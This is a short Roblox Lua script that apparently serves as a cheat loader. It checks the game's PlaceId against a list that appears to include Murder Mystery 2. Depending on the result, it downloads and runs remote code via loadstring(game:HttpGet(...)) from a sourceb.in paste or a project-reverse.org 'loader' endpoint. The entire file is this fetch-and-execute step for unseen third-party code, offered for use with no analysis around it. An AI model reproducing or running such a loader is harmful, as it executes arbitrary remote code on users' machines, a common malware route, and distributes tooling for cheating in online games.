local allowedPlaceIds = {
    [142823291] = true,
    [335132309] = true,
    [636649648] = true,
    [5928494131] = true,
    [80469437126309] = true
}

local function firstScript()
    loadstring(game:HttpGet("https://cdn.sourceb.in/bins/rcNysOctBR/0", true))()
end

local function secondScript()
    loadstring(game:HttpGet("https://api.project-reverse.org/run/eyJpZCI6IjgxN2EyNjcyLTZhN2ItNDQ0MS05ZDc5LWE5NmRlMDZiY2JmOCIsImtpbmQiOiJsb2FkZXIiLCJ2aXN1YWwiOnsiaWQiOiJtbTJvdmVyZHJpdmVvcmlnaW5hbCJ9fQ"))()

end

if allowedPlaceIds[game.PlaceId] then
    task.spawn(secondScript)
else
    task.spawn(firstScript)
end
